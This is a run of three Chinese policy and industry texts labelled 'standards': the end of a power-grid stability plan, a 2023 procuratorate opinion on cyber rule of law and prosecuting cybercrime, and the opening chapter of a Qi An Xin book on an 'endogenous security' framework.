(二十四)构建稳定技术标准体系。充分发挥现有稳定技术标准体系作用。建立健全以《电力系统安全稳定导则》《电力系统技术导则》《电网运行准则》为核心的稳定技术标准体系,强化标准在引领技术发展、规范技术要求方面的重要作用。持续完善稳定技术标准体系。完善新能源并网技术标准,提高集中式、分布式新能源频率电压耐受能力和支撑调节能力;建立新型储能、虚拟电厂、分布式智能电网等新型并网主体的涉网技术标准;完善新型电力系统供需平衡、安全稳定分析与控制保护标准体系;开展黑启动及系统恢复、网络安全等电力安全标准研制;引领新形势下电力系统稳定相关国际标准制修订。 六、组织实施保障 (二十五)建立长效机制。完善电力行业稳定工作法规制度体系,强化政策措施的系统性、整体性、协同性。建立健全电力系统稳定工作长效机制,强化规划执行的严肃性,加强统筹协调,一体谋划、一体部署、一体推进重大任务,定期研究解决重点问题与重大运行风险,协调解决保障电力供应和电力系统稳定运行面临的问题。系统谋划灵活调节性资源可持续发展机制。 (二十六)压实各方责任。建立健全由国家发展改革委、国家能源局组织指导,地方能源主管部门、国家能源局派出机构、发电企业、电网企业、电力用户和其他相关市场主体各负其责、发挥合力的电力系统稳定工作责任体系。地方能源主管部门履行好电力规划、电力建设、电力保供的属地责任,会同地方经济运行管理部门加强电力稳定运行工作。发电企业加强燃料供应管理,强化涉网安全管理,提高发电设备运行可靠性。电网企业做好电网建设运维、调度运行等环节的稳定管理,强化电网安全风险管控。电力用户主动参与需求响应,按要求执行负荷管理,践行节约用电、绿色用电。其他相关市场认真落实电力系统稳定工作要求。国家能源局派出机构根据职责依法加强监管,推动相关稳定措施落实到位。 (二十七)加强宣传引导。开展形式多样的政策宣传和解读,凝聚行业共识,引导各方力量树立全网一盘棋的思想,发挥各自优势形成合力。加强电力系统稳定工作人才队伍建设,提升电力系统管理人员和技术人员工作水平。及时总结新型电力系统稳定工作经验,推广典型模式和先进技术。
standards
关于加强新时代检察机关网络法治工作的意见 发布时间:2023年4月18日 加强新时代网络法治工作是全面依法治国的必然要求,是网络强国建设的重要任务。为认真学习贯彻党的二十大精神,依法能动履行法律监督职责,以检察工作现代化融入和助力网络法治工作现代化,更好维护政治安全、社会安定、人民安宁,更好服务保障网络强国、数字中国建设,结合检察工作实际,现提出以下工作意见。 一、深入贯彻习近平总书记关于网络强国的重要思想,不断增强做好网络法治工作的政治自觉、法治自觉和检察自觉 (一)充分认识加强新时代网络法治工作的重要意义,为网络法治建设提供有力司法保障。网络既是重要的基础设施,又是政治、经济、国防、科技、教育等领域开展工作的重要载体,日益成为国家核心竞争力的关键因素。党的十八大以来,习近平总书记高度重视网络强国建设,统筹发展和安全,提出了一系列新理念新思想新战略,形成了习近平总书记关于网络强国的重要思想。党的二十大报告强调,加快建设网络强国、数字中国;健全网络综合治理体系,推动形成良好网络生态;强化网络安全保障体系建设,对新时代网络强国建设、网络法治工作提出新任务新要求。各级检察机关要立足于全面建设社会主义现代化国家、全面推进中华民族伟大复兴新的历史起点,以习近平新时代中国特色社会主义思想为指引,深入贯彻习近平法治思想,全面贯彻党的二十大精神,深刻领悟“两个确立”的决定性意义,增强“四个意识”、坚定“四个自信”、做到“两个维护”,坚持在全面依法治国、建设社会主义法治国家总进程中,在网络强国、数字中国建设总规划中,在全面加强新时代检察机关法律监督工作总部署中谋划和推进网络法治工作,以更高质量的检察履职为健全网络综合治理体系建设提供有力法治保障,助推提升网络综合实力,促进经济社会高质量发展。 (二)认真落实党的二十大关于健全网络综合治理体系的部署要求,在更高起点上谋划和推进检察机关网络法治工作。党的二十大对加强检察机关法律监督工作提出新的更高要求,检察机关在推进新时代网络法治工作中肩负着更重责任。要对照党的二十大关于健全网络综合治理体系的部署要求,坚持党对网络法治工作的全面领导,贯彻总体国家安全观和新发展理念,强化底线思维和风险意识,确保检察机关网络法治工作的正确政治方向。坚持以人民为中心,积极回应人民群众的新要求新期待,依法严厉打击人民群众反映强烈的网络犯罪,运用法治思维和法治方式维护网络时代人民群众的合法权益,以典型案例引领网络文明建设,营造良好网络生态,让人民群众在网络法治建设中有更多获得感幸福感安全感。坚持系统推进,统筹把握发展与安全、国内与国际、打击与保障、惩治、预防与治理等关系,依法全面能动履行刑事、民事、行政、公益诉讼检察职能,提升法律监督质量和效果,发挥好“惩治网络犯罪、维护网络安全”研究指导组作用,汇集内外部力量,推动工作整体协同发展。坚持开拓创新,注重将司法改革、检察改革的成果运用到网络法治工作中,注重发挥新技术对检察履职赋能作用。积极推动网络司法规则制定,探索具有中国特色的网络检察工作模式和路径,不断推进网络时代检察理论创新、实践创新和制度创新。 二、充分发挥司法办案职能,维护网络空间安全,服务数字经济健康发展 (三)聚焦捍卫国家政权安全、制度安全和意识形态安全,依法严厉打击利用网络实施的危害国家安全犯罪。以高度的政治责任感,依法严厉打击利用网络实施的分裂国家、煽动叛乱、颠覆政权、间谍窃密等犯罪活动,依法严惩利用网络实施的暴力恐怖、邪教破坏等犯罪,坚决捍卫国家安全。 (四)聚焦维护网络系统安全、数据安全,依法加大对危害计算机信息系统安全犯罪的惩治力度。深入贯彻落实《中华人民共和国网络安全法》《中华人民共和国数据安全法》等法律,加大对关键信息基础设施的司法保护力度,依法严惩网络黑客非法侵入、非法控制、破坏计算机信息系统特别是涉及国家安全、民生重要领域计算机信息系统等犯罪。依法严惩针对我国重要信息系统、窃取关键数据,以及其他泄露、非法获取、非法利用数据的相关犯罪。推动压实网络运营者、数据处理者、关键信息基础设施运营者的信息网络安全管理、数据安全保护义务,依法惩治拒不履行网络安全管理义务犯罪,筑牢网络数据安全屏障。 (五)聚焦人民群众获得感、幸福感、安全感,全链条惩治人民群众反映强烈的网络犯罪。始终保持对网络贩卖枪爆、网络贩毒、网络淫秽色情、网络赌博等犯罪活动的严打态势。按照打击惩治涉网黑恶犯罪专项行动工作方案,会同有关部门严厉打击利用信息网络实施“裸聊”敲诈、“套路贷”、软暴力催收、恶意索赔等犯罪活动的黑恶势力组织。依法全链条打击电信网络诈骗及关联犯罪,积极参与“断卡”“断流”“拔钉”等专项行动;依法追诉前端非法收集、提供、买卖公民个人信息,后端利用“跑分平台”、虚拟货币、直播打赏进行“洗钱”等犯罪。认真落实《中华人民共和国反电信网络诈骗法》,加强与公安、法院及有关部门协同联动,推动构建“全链条反诈、全行业阻诈、全社会防诈”打防管控体系。依法严惩“网络暴力”等侵犯公民人身权利相关犯罪,深挖背后的产业链利益链,严厉打击“网络水军”造谣引流、舆情敲诈、刷量控评、有偿删帖等行为涉嫌的相关犯罪,协同整治“自媒体”造谣传谣、假冒仿冒、违规营利等突出问题,加强典型案例发布曝光,净化网络舆论环境。认真落实《中华人民共和国个人信息保护法》,加大公民个人信息司法保护力度,依法严惩“数据黑企”“行业内鬼”以及批量泄露、买卖、“暗网”交易公民个人信息、非法收集在校学生和老年人等群体公民个人信息、利用“爬虫”“撞库”等技术手段非法收集公民个人信息等犯罪。准确把握公民个人信息处理的原则和边界,统筹数据信息开发利用、隐私保护和公共安全,加大涉公民个人信息、隐私权案件的民事检察监督力度。围绕敏感个人信息、特定群体、重点领域的公民个人信息等,持续加大公益诉讼办案力度,积极探索建立民事公益诉讼惩罚性赔偿制度。 (六)聚焦数字经济健康发展,依法保护和规范数字技术、数字产业和数字市场。发挥知识产权检察办公室综合履职的优势,突出加大对集成电路、人工智能、大数据、云计算等重点领域核心技术的司法保护力度,依法加强对计算机软件、数据库、网络域名、数字版权、数字内容作品等网络知识产权的司法保护,依法惩治滥用知识产权排除市场竞争、阻碍创新的行为,推动数字技术成果的创新发展和转化。加强对“元宇宙”、人工智能、区块链、云计算等新技术新业态相关法律问题的前瞻研究,强化安全风险综合研判,准确把握创新发展与违法犯罪的界限,及时发现、精准惩治以新技术新业态为幌子实施的各类犯罪活动,既保护创新发展,又有效防范各类风险叠加演变。大力加强对企业数据产权的司法保护,依法惩治非法获取企业数据、侵犯企业商业秘密等犯罪活动,保障数字产业创新发展。依法平等保护数字经济各类市场主体的合法权益,加大对利用网络发布不实信息诋毁企业商业信誉、实施敲诈勒索等犯罪的惩治力度。综合运用多种方式,加大对电商消费者、新就业形态劳动者等主体权益的司法保护力度。深入研究数据交易、数据服务等新类型案件涉及的数据权属问题,切实保护权利人在数据收集、使用、交易等过程中的合法权益,推动完善数据权利司法保护规则,促进数据要素市场依法有序发展。立足检察职能,依法稳妥探索推进反垄断公益诉讼,防止经营者滥用市场支配地位和数据算法优势实施垄断行为,损害社会公共利益。依法打击治理刷单炒信、直播售假、流量劫持、勒索维权、虚假广告和恶意抢注商标、域名、深度链接等不正当竞争活动,维护数字市场公平竞争的良好秩序。 (七)聚焦网络空间未成年人权益,大力加强未成年人综合司法保护。以“零容忍”的态度,依法严厉惩治侵害未成年人权益的网络犯罪。突出惩治成年人胁迫、教唆、引诱、欺骗未成年人参与电信网络诈骗、帮助信息网络犯罪等犯罪活动。持续惩治利用平台隔空猥亵未成年人、搭建运营涉未成年人色情网站、利用即时通讯工具传播涉未成年人淫秽物品等犯罪活动。对涉嫌网络犯罪的未成年人,坚持依法惩戒和精准帮教,及时教育感化挽救;对受到犯罪侵害的未成年人,及时开展综合救助保护。严格落实《中华人民共和国未成年人保护法》关于网络保护的要求,协同加强涉未成年人网络治理,针对未成年人沉迷网络、受到不良信息侵蚀侵害以及网络新业态危害未成年人健康成长等突出问题,通过公益诉讼、支持起诉、检察建议等多种形式推动家庭、学校、社会、网络平台、政府等多方协同、齐抓共管,合力筑牢未成年人网络安全“防火墙”。 三、统筹运用刑事、民事、行政、公益诉讼检察监督,强化一体履职数据赋能,协同推进网络空间综合治理 (八)全面履行对网络犯罪案件的刑事检察监督职能。会同行政主管部门加强网络行政执法与刑事司法双向衔接,加快推进信息共享机制化、案件移送标准化和程序规范化。对于行政执法机关应当依法移送涉嫌网络犯罪案件而不移送的,提出检察意见要求行政执法机关移送公安机关处理;对决定不起诉的犯罪嫌疑人,依法需要给予行政处罚的,提出检察意见移送有关行政执法机关处理。充分发挥侦查监督与协作配合办公室的作用,强化刑事立案监督,加强与公安机关沟通,规范案件管辖;强化侦查活动监督,会同公安机关规范强制措施和侦查手段适用;加强重大疑难网络犯罪案件办理的协作配合,会同公安机关深挖关联案件证据线索,加强对电子数据专业化审查,依法及时有效追诉犯罪。认真落实宽严相济刑事政策,对于涉案人数多、涉及面广的网络犯罪案件,坚持分类分层处理,做到该严则严、当宽则宽。强化刑事审判监督,综合运用抗诉、纠正意见、检察建议等监督手段,及时纠正定罪量刑明显不当、审判程序严重违法等问题。高度重视涉案财物处置,加强对公安机关移送的涉案财物的证据材料审查,会同公安机关、人民法院积极推动对涉案财物依法、及时查封、扣押、冻结和有效处置,最大限度追赃挽损。 (九)积极开展网络治理领域检察公益诉讼。坚持把网络治理作为公益诉讼服务国家治理的重要切入点,充分发挥公益诉讼检察维护网络领域国家利益和社会公共利益的职能作用。聚焦危害网络安全、数据安全、个人信息安全、侵害网络用户权益、电子商务消费者权益、利用网络侵害英雄烈士名誉、荣誉等突出公益损害问题,充分履行个人信息保护、反电信网络诈骗、英雄烈士保护等法定领域公益诉讼检察职能,积极稳妥探索网络治理新领域公益诉讼检察实践,统筹运用民事、行政公益诉讼方式,推动网络违法犯罪诉源治理、公益损害风险预防与企业合规建设。健全行政执法与公益诉讼检察衔接协作机制,发挥公益诉讼在促进依法行政、维护国家利益和社会公共利益方面的职能作用。对于承担一定公共管理职能和重要社会责任的网络运营者、电子商务平台经营者,积极探索民事公益诉讼监督方式,夯实平台社会责任,督促和支持企业规范有序平稳发展。建立健全公益诉讼检察与刑事检察衔接协作机制,利用大数据赋能,打破业务条线之间的信息壁垒,实现对网络违法犯罪全链条打击、一体化治理。 (十)精准开展网络治理领域民事行政检察监督。深入贯彻实施《中华人民共和国民法典》,深刻认识互联网、大数据、平台经济等对社会生产、组织形式、交易方式以及法律关系产生的重大影响,不断更新民事检察监督理念。针对在线办理民商事案件的特点,加强与互联网法院、互联网科技企业、行业协会等沟通,主动融入互联网司法保护大格局,共同构建互联网领域纠纷多元解决机制,防范和化解互联网空间风险和矛盾。积极探索研究对在线诉讼、诉前纠纷化解以及互联网纠纷案件量化裁判等开展检察监督的模式和规则,依托网络平台,利用信息技术,创新监督方式方法,提高监督质效。大力开展网络司法拍卖民事执行监督,助推网络司法拍卖规范化、高效化。依法办理涉企业数据产权民事监督案件,推进完善数据要素合规高效流通交易。加强涉电商平台、直播平台纠纷民事案件监督,维护公平竞争市场秩序。积极履行行政检察监督职责,加大对涉互联网行政诉讼案件的监督力度,常态化开展涉互联网行政诉讼案件的行政争议实质性化解,推动构建行政检察与行政监管相衔接制度。围绕司法办案发现的网络执法、行政监管突出问题,积极发挥检察建议作用,持续推进“六号检察建议”落实,协同有关部门推动健全网络治理体系。 (十一)积极稳妥开展涉案互联网企业合规工作。积极探索在网络数字领域适用涉案企业合规改革和第三方监督评估机制,推动涉案互联网企业积极主动开展合规建设,通过制定合规管理规范,弥补监督管理漏洞,建立健全合规管理的制度机制,有效预防网络违法犯罪。探索以事后合规整改促进企业事前合规建设,结合办理的典型案例,推动网络监管部门、第三方组织、互联网企业研究制定数据合规规范指引,推动建立健全公共数据、企业数据、个人数据分类分级管理机制,保障数字经济健康发展。 (十二)建立上下一体、内部协同的监督办案模式。针对网络犯罪案件跨域性、涉众型、链条化等特征,探索网络犯罪重点罪名的集中统一办理,发挥检察一体化优势,加强统筹指挥,建立案卷远程调阅、证据远程调取、诉讼当事人远程讯(询)问等制度。全面协调充分履行“四大检察”职能,推动在网络治理领域各检察部门之间的线索移送、人员协作、信息共享、会商研判,形成对网络空间的保护合力。 (十三)以大数据赋能推进法律监督提质增效。深入贯彻落实数字检察战略,统筹网络检察和数字检察工作,充分运用大数据推进法律监督全面深化,促进网络诉源治理,加强检务科学管理。推进国家检察大数据中心建设,指导并支持有条件的地区开展分中心建设,强化对检察业务数据的深度挖掘、智能分析、系统利用。持续推动政法跨部门办案平台建设,实现执法司法数据共享、跨部门大数据协同办案。深化对涉网络类案监督,加强办案数据集成分析,加大对监督模型设计研发,加大对各业务条线重点监督类案培育指导,实现个案办理式监督与类案治理式监督并重,推动新时代法律监督提质增效。 四、积极参与网络立法,促进网络法律体系建设 (十四)积极参与网络立法制定修订工作。配合立法机关和行业主管部门,推动制定修订网络安全法、网络犯罪防治法、反不正当竞争法、未成年人网络保护条例等法律法规,提供司法实践样本,提出立法意见建议。积极适应网络违法犯罪迭代升级、网络行为多元发展的形势,围绕网络立法重点领域,注重通过类案监督提出相关立法建议,推动网络法律制度和司法规则的创新和生成。 (十五)加快制定修订司法解释及规范性文件。会同有关部门加强网络犯罪法律适用问题研究,及时制定完善符合打击治理网络犯罪规律特点的追诉标准、证据调取规范、证据审查要求和证明规则、涉案资产处置办法等。研究制定网络治理领域办理检察公益诉讼案件的工作意见,完善相关案件管辖、起诉标准、举证责任、诉讼请求、诉讼监督等程序规定。加强对公民个人信息类型和刑事处罚标准的研究,推进完善对公民个人信息的法律保护体系。积极推动制定完善涉互联网民商事案件司法规则,依法规范网络民事主体和网络民事行为。细化完善网络侵权责任的具体规定,更好地平衡网络用户和网络服务提供者之间的利益关系。推进完善网络仲裁、网络公证活动的制度办法,探索规范检察监督的路径和方法。 (十六)积极参与网络空间国际治理。积极参与《联合国打击网络犯罪公约》的谈判,提出和阐释我国推进网络空间法治化的理念和做法。利用金砖国家、上海合作组织成员国、中国—东盟成员国总检察长会议机制、国际检察官联合会等平台,与相关国家进行磋商,签订多边、双边协议,强化打击网络犯罪领域的刑事司法协助,推动网络安全跨境执法司法合作不断深化。加强对网络治理涉外领域立法和国内法域外适用问题的研究,组织翻译相关域外材料,加大培训交流。 五、加强网络法治研究,推进网络检察队伍专业化建设,不断提升依法治网能力水平 (十七)加强网络法治研究,促进检产学研相结合。适应网络法治研究交叉性、综合性、前沿性特点,加强检校合作,探索在高校、科研院所建立网络法治研究基地,通过研究人才、资料、平台的共享互通,加强对网络法治重大、前沿问题的研究,加强检察机关网络法治人才的培养锻炼。注重加强与网络科技企业的交流合作,了解互联网前沿发展态势,研商网络治理的对策路径。加强网络法治智库建设,聚焦重大网络法治问题,提供政策建议。加强类案分析,及时向党委政府报送网络数字领域社会治理专项调研报告。 (十八)大力加强专业化队伍建设。建立网络法治特殊人才引进机制,加大涉外网络法治人才选拔培养,加大财政、科技、信息等投入保障,整合配强工作力量。优化充实全国网络检察人才库,加强检察办案和检察技术人才内部交流协作,加强与网络执法部门的互派交流挂职,提升办案能力和合力。推动建立技术调查官、特邀检察官助理辅助办案机制,针对技术性较强的案件,发挥技术辅助办案作用。因地制宜在条件成熟的地方检察机关成立网络检察办案基地,依托基地建设,加强跨区域网络案件指挥协调、网络法治研究和专业人才培养。 六、加强网络法治宣传,加大对外传播力度,推动共建清朗网络空间 (十九)持续深入开展党的二十大精神和习近平法治思想的网络宣传。把深入宣传贯彻党的二十大精神、习近平法治思想作为网络法治宣传的首要任务,把检察网络平台作为党的二十大精神宣传的重要阵地。深入解读党的二十大精神、习近平法治思想、习近平总书记关于网络强国的重要思想的精髓要义,展示新时代网络法治工作的突出成就,讲好能动履职推动诉源治理的网络检察好故事,引领网络舆论,形成良好氛围,在网络宣传上展现法治新面貌、检察新作为,推动形成网上正面舆论强势。 (二十)积极落实“谁执法谁普法”普法责任制。深入落实“八五”普法规划,结合检察办案,宣传解读宪法、民法典和重要互联网法律法规。加强以案释法,聚焦易受害群体、案件高发行业和重点地区,定期发布网络检察白皮书、通报检察办案情况、制发指导性案例及典型案例,结合检察听证同步开展普法工作,提升全社会网络法治意识。深入推动网络普法“进企业、进学校、进社区、进农村”,将青少年网络法治宣传教育作为重点,加强互联网行业从业人员法治教育,增强普法教育的针对性和实效性。强化分众化、差异化、精准化网络普法宣传,打造检察网络普法品牌,持续巩固壮大检察网络主流舆论,最大限度凝聚全社会法治共识。 (二十一)加大对外网络法治传播力度。加强网络空间治理法治化国际交流,以国际交流合作为契机,深入阐释党的二十大精神、习近平法治思想和习近平总书记关于构建网络空间命运共同体的理念主张,大力宣传中国检察机关能动履职、依法治网的生动实践,不断提升国际影响力和感召力。
standards
内生安全:新一代网络安全框架体系与实践 序 随着数字经济时代的到来,政府和企业开始全面实施网络化、数字化,业务和数据的安全性也因此成为重中之重。尤其是伴随着5G、数据中心、工业互联网等新型基础设施建设的推进,数字经济加速向纵深发展,传统基础设施亟需转型升级,这进而形成了融合基础设施,加速了物理与虚拟边界的消融,带来了全新的安全挑战。 内生安全重塑网络安全体系 在新的网络安全形势下,政企机构的网络安全投入不断增加,但与此同时,网络攻击、数据泄露事件依然层出不穷。网络安全行业陷入投入不断增加、安全形势却日益严峻的尴尬局面。安全威胁之所以“防不住”,主要原因是传统的产品堆叠的网络安全体系已经不能有效应对当前的网络安全挑战。在传统的互联网时代,网络安全企业和个人习惯采取“事后补救”的措施来应对网络威胁,也就是等出了事后再采取安全措施。这种方式往往是“头痛医头、脚痛医脚”,是局部的、针对单点的,而不是彻底的和全面的。这种“局部整改”为主的安全建设模式,导致网络安全体系化缺失、碎片化严重、协同能力差,使得网络安全防御能力与数字化业务的保障要求严重不匹配。 为了满足数字化建设的安全防护需求,政企机构必须抛弃这种“事后补救”的安全建设思路,将防护关口前移,防患于未然,通过内生安全系统的工程建设,构建全面的“事前防控”网络安全防护体系,用“实战化、体系化、常态化”的要求,实现动态防御、主动防御、纵深防御、精准防护、整体防控、联防联控。 “内生安全”通过系统聚合、数据聚合和人的聚合,内置于信息化环境中并不断自我生长出安全能力。内生安全有“一个中心,五个滤网”,从网络、数据、应用、行为、身份这5个层面来有效实现对网络安全体系的管理,从而构建无处不在、处处结合、实战化运行的安全能力体系。 内生安全落地的关键是框架 内生安全的实施是一套复杂的系统工程,需要一个新形态的能力体系做支撑,需要用工程化、体系化的方式实施,而实施的关键就是安全框架。 在信息化系统功能越来越多、规模越来越大、与用户的交互越来越深时,单一的、堆叠的安全产品和服务(哪怕是最新最先进的)都无法保证不被黑客攻破。但是,内生安全系统能够让安全产品和服务相互联系、相互作用,在整体上具备单个产品和服务所没有的功能,从而保障复杂系统的安全。 过去20年,在信息化建设方面,国内外采用的是系统工程思想,通过行之有效的EA(Enterprise Architecture,企业架构)方法论与框架,引导与推动了大规模、体系化、高效整合的信息化建设,很好地支撑了各行业的业务运营。针对网络安全,有些西方国家采用体系化思想,设计出了适应它们的发展阶段的NIST(美国国家标准与技术研究院)等框架。但由于我国的网络安全基础比较薄弱,无法套用西方现成的框架进行安全体系建设,因此采用了“局部整改”为主的安全建设模式。 针对我国的国情,我们提出了“内生安全——新一代网络安全框架”,从工程实现的角度,将安全需求分步实施,逐步建成面向未来的安全体系。这套框架从顶层视角出发,以系统工程的方法论结合内生安全的理念,支撑各行业的建设模式从“局部整改外挂式”走向“深度融合体系化”,在数字化环境内部建立无处不在的网络安全“免疫力”,真正实现内生安全。 框架实施的关键是组件 内生安全要想成功落地,最理想的情况是建设一个完整的框架。但现实情况是,大多数政府和企业的信息化系统都是新老结合,往往需要花费若干年的时间,才能完成对老系统的替换。这是一个“立新破旧”的过程。从安全系统与信息化系统聚合的实施角度来看,如果对老系统用老办法,对新系统用新办法,则未来老系统被替代时,老的安全系统也不得不替换掉,这种割裂的处理方式将造成巨大的浪费。这就要求我们对安全体系进行统一设计,并分步实施。在安全体系的基础上,把安全框架组件化,让这些组件既是新体系的一部分,又能部署到老系统中,从而适应信息化系统这种渐进式的、立新破旧的过程,以避免不断地把安全系统推倒重来,并确保现在安全上的投资是面向未来的。 我们用工程化的思想,把安全体系中的安全能力,映射成为可执行、可建设的网络安全能力组件,由此构成了内生安全框架。这些组件与信息化系统进行体系化的聚合,是安全框架落地的关键。 在“内生安全——新一代网络安全框架”中,我们设计解构出了“十大工程、五大任务”,这是该框架的具体落地指导,涵盖了当前所有的主流场景以及与技术相关的信息化系统所需要的安全能力。这个体系中包含了130多个信息化组件、79类网络安全组件,覆盖了29个安全域场景。这相当于打造了一个信息化巨系统内生安全框架的建设样板,每一个工程和任务都可以理解成样板房里的不同“房间”。政企机构可以结合自身信息化的特点,选取不同的“房间”进行组合,定义自己的关键工程和任务。 “内生安全——新一代网络安全框架”的意义 “内生安全——新一代网络安全框架”是从信息化的角度规划安全建设,立足解决未来10~20年的网络安全问题。这一框架可以指导政企机构进行体系化的网络安全规划建设,从过去“局部整改为主的外挂式”建设模式走向“深度融合的体系化”建设模式,使之能够输出体系化、全局化、实战化的网络安全能力,构建出动态综合的网络安全防御体系。 “内生安全——新一代网络安全框架”催生了新的安全需求,为网络安全生态发展创造了更大的空间。要满足新的网络安全需求,必须借助生态整合的力量,协同网络安全厂商、基础设施厂商、应用开发厂商,以及教育、科研机构、主管部门和用户,共同打造“产、学、研、用、管”一体化的网络安全产业生态。 ——齐向东,奇安信集团董事长 前言 经历了过去二十多年的发展,网络安全已经落后于以体系化发展的信息化,与信息化发展不匹配,不仅仅是安全能力达不到要求,还存在规模落差、成熟度落差和覆盖面落差。这不但无法支撑数字化、智能化时代的信息化保障,同时也带来了网络安全产业发展自身的诸多问题,比如小规模、零散化、同质化。要解决网络安全发展问题,不能依靠单个产品创新,也不是等待政策的来临,更不能要求客户无限制地增加预算。 网络安全产业要改变零散发展的模式,重要的是从信息化的角度,采用面向规划的新一代网络安全框架,构建内生安全能力,同时布局产业增长。 根据中国信息通信研究院2019年的数据,我国网络安全产业规模为608亿元,在整个数字经济产业中占比只有1.7%;而IDC(国际数据公司)的数据显示,网络安全投入在IT整体预算中的占比仅为1.84%,不仅远低于美国的4.78%,甚至低于全球平均的3.74%。网络安全产业规模与市场预期不平衡,与数字化转型和数字经济发展所需要的信息化保障能力不匹配,网络安全产业亟待破解规模小的困局。 奇安信自2014年成立以来,一直在开展技术创新,提出了包括数据驱动安全等创新理念。但在逐渐壮大规模的过程中,奇安信也碰到了业界很多网安企业都面临的问题——如何破解产业规模小的困局。 回顾网络安全产业的发展历程,过去主要受事件和合规驱动,并没有相应的方法论,网络安全建设非常零散,而且多是应激式的局部建设。网络安全建设长期存在缺规划、缺预算、缺人手、缺运营的情况,这导致其难以支撑数字化、智能化时代的信息化保障。 近年来,实战演练正在成为监督、检查和检验网络安全工作和能力水平的常态化手段。事实证明,实战演练对于网络安全的推动效果十分明显,如何常态化对抗威胁是亟待解决的难题。 如何解决这一难题,扩大网络安全产业规模,这一直困扰着网络安全行业的每个人。 在信息化的重构和新建过程中,在云网改造、大数据系统建设,以及业务、数据和应用发生变化时,通过系统融合、数据融合、人员融合,实现网络安全能力与信息化环境的融合内生,在这个过程中可以有效地把安全方法论与IT(信息技术)对标,解决网络安全落后于信息化发展的主要问题。 信息化使用EA(企业架构)方法论,将信息化从零散的建设发展到系统化的服务,使信息化有更好的发展和未来。对网络安全来说,在规划建设信息化系统时就嵌入安全机制和措施;同时,在规划时确立安全运行的机制;这种机制可以有效破解产业规模小、发展散乱的困境。 要改变过去网络安全零散发展的模式,以甲方视角,从信息化角度,用面向规划的内生安全框架来布局产业增长。所谓内生安全框架,是指奇安信基于长期政企网络安全防护实践形成的安全框架。该框架的核心是指导政企机构体系化的网络安全规划建设,从过去局部整改为主的外挂式建设模式走向深度融合的体系化建设模式,使之能够输出体系化、全局化、实战化的网络安全能力,以内生安全理念建立数字化环境内部无处不在的“免疫力”,构建出动态综合的网络安全防御体系。而在这个过程中,通过规划、建设、服务等扩大网络安全预算,进而提升网络安全产值。内生安全框架具有集约化和工程化的特点,更符合我国政企机构通过开展“五年规划”来集中力量办大事、解决大问题的成功做法。 内生安全框架的落地实践可以总结为:一套方法论、四个放大器、两个全景模型、贯穿项目全生命周期和两个确保。其中,一套方法论是指从信息化角度,用系统工程思想与EA方法进行网络安全规划设计,以能力为导向,以架构为驱动。基于这套方法论形成了安全产业的四个放大器:一是基于SANS(美国系统网络安全协会)的滑动窗口模型识别出客户所需的所有安全能力;二是安全能力与信息化深度融合;三是安全能力全面覆盖信息化环境;四是形成可闭环运行体系。通过采用工程化思想,规划建设内生安全框架,最终会生成两个全景模型——通过规划形成政企机构防御技术全景模型和政企机构防御运行全景模型,以此指导政企机构的网络安全防御体系的建设和运行。与此同时,网络安全服务过程将贯穿项目全生命周期——从规划、可研、立项、招投标、集成交付到可运行,确保客户安全项目可建设、能运行。 由此,可以形成一个巨大的网络安全服务化的市场。以内生网络安全框架体系的两个全景模型为基础可以生成网络安全建设视图和网络安全产业机遇地图,可用于指导网络安全产业的创新和发展。 内生安全框架对于政企机构来说,可以帮助规划设计和落地,同时推动政企机构需求侧的不断打开,由此拓宽供给侧的市场。这对于网络安全行业而言,可实现标准化、体系化、集约化生产,加快形成布局合理、分工有序、相互衔接的规模效应,从而告别此前的“小零同”(小规模、零散化、同质竞争)状况,在更宽的赛道上发展。 在这个过程中,整个国家的网络空间安全亦将受益。因为通过体系化的建设,关键信息行业与机构真正拥有的网络安全能力体系,将成为国家网络空间中有效防御的一环,保障整体的国家网络安全战略落地。 在《中共中央关于制定国民经济和社会发展第十四个五年规划和二〇三五年远景目标的建议》(以下简称《建议》)中,提出了加快数字化发展,并明确要求保障国家数据安全,加强个人信息保护;《建议》提出了统筹发展和安全的新理念,网络安全作为国家安全能力体系的一部分,要全面加强网络安全保障体系和能力建设。 网络安全行业要抓住“十四五”规划机会,落实中央要求,面向国家大数据战略的信息化发展保障需要,依托内生安全框架进行网络安全顶层规划,指引网络安全建设从“零散”走向“全局”,彻底改变过去“头痛医头、脚痛医脚”的局部的、针对单点的建设模式,走向彻底、全面解决问题的体系化全局建设模式,全面加强网络安全保障体系和能力建设,为国家大数据战略保障护航。 第1部分 为什么需要内生安全 第1章 信息化的发展与安全的挑战 第1章 信息化的发展与安全的挑战 2020年4月9日,《中共中央 国务院关于构建更加完善的要素市场化配置体制机制的意见》(以下简称“《意见》”)正式发布。《意见》首次将数据列为与土地、劳动力、资本、技术并列的生产要素。 这可以看作是信息化发展历史上的一个里程碑,数据作为数十年信息化应用和发展的结果,已经成为经济社会发展的核心生产要素之一,这也意味着信息化作为当今时代经济社会发展核心驱动力的地位正式确立。 正是在这样的时代背景下,网络安全工作者顺应信息化建设与发展的内在需求,创造性地提出了“内生安全”这一新型网络安全建设思想。为了深入地理解“内生安全”思想,首先就必须理解我国的信息化发展历程和网络安全发展历程,同时理解数字化时代网络安全工作的时代特征。 1.1 信息化的发展历程 回顾我国的信息化发展历程,不同领域、不同角色会有不同的维度和视角。但无论是哪种维度,都需要以国家的经济社会发展为大背景,从政企发展需求,或从政策驱动视角来观察。在下文中,我们从国家政策驱动和建设方法两个维度进行梳理。 1.1.1 政策驱动的政务信息化发展历程 长期以来,我国在政企机构信息化方面的政策驱动属性较强,企业信息化与政务信息化紧密相关,政务信息化的发展历程在一定程度上决定了企业信息化的发展历程。 我国的政务信息化发展经历了以下4个主要的阶段。 ● 第一阶段:办公自动化阶段 主要目标是普及推广计算机在办公系统中的应用。1992年,《国务院办公厅关于建设全国政府行政首脑机关办公决策服务系统的通知》(国办发〔1992〕25号)出台,推动了政府系统办公自动化的快速发展。 ● 第二阶段:业务流程自动化阶段 1993年,国务院信息化工作领导小组拟定了《国家信息化“九五”规划和2010年远景目标(纲要)》;1994年底,我国正式启动了国民经济信息化的起步工程——“三金工程”:金桥工程、金关工程和金卡工程。“三金工程”是我国中央政府主导的以政府信息化为特征的系统工程,是我国政府信息化的雏形。 随着互联网的兴起,1999年1月,40多个部委的信息主管部门共同倡议发起了“政府上网工程”,目标是部委和各级政府部门上网。同时利用政府职能启动行业用户上网工程,例如“企业上网工程”。在“政府上网工程”推动下,我国大部分政府职能部门如税务、工商、海关、公安等部门都已建成了覆盖全系统的专网;当初的“三金工程”也扩展到了“十二金工程”。 ● 第三阶段:全面信息化阶段 